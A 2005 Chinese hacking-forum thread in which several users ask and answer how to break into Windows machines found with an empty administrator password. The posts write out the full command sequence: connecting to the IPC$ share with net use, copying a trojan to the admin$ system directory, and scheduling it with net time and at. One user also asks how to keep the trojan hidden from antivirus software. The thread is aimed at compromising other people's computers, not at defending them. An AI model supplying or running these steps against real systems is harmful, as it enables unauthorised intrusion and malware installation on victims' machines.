|
 | 作者: xjn147 [xjn147]
 论坛用户 |
登录 |
| 我扫描到了一个administrator的空口令 net use \\* * * *\ipc$ "" /user:"administrator" 连接成功 net view \\* * * * 他只有一个 qaz 共享名,没有路径和说明 copy e:\我的小马 \\* * * *\qaz 小马也能拷贝到他 qaz 里 net time \\* * * * 比如是8点 at \\* * * * 8:02 ???? 我的问题就在这里他的网络路径应该怎么写 |
| 地主 发表时间: 05-09-24 21:35 |
 | 回复: XO [guang0701]  论坛用户 |
登录 |
|
你的小马要COPY他的SYSTEM32(admin$)目录下,才能用AT命令运行 估计他的qaz不会是SYSTEM32,看来你的小马运行不了了。 at \\* * * * 8:02 我的小马.exe [此贴被 XO(guang0701) 在 09月25日12时14分 编辑过] |
| B1层 发表时间: 05-09-25 12:13 |
 | 回复: koking [koking]  论坛用户 |
登录 |
|
net use \\*.*.*.*\ipc$ "" /user:"administrator" net view \\* .*.*. * copy e:\我的小马 \\*.*.*.*\admin$\system_32 net time \\*.*.*.* at \\*.*.*.* **:** 我的小马 |
| B2层 发表时间: 05-10-12 22:37 |
 | 回复: hacker120 [hacker120] 论坛用户 |
登录 |
|
上传木马后有什么用呢?都会被杀毒软件无情的杀掉!有办法可以使木马不被杀掉吗? |
| B3层 发表时间: 05-10-18 19:29 |
 | 回复: my1500 [my1500] 论坛用户 |
登录 |
|
我也找到个用户名为Administrator,口令为空的主机,copy c:\1234.exe(我的马)显示成功后运行at(例子:at \\221.*.***.54 08:50 1234.exe)却显示说绑定句柄无效,这是为何?望速来教我谢谢! |
| B4层 发表时间: 05-10-20 20:29 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: ipc$问题求教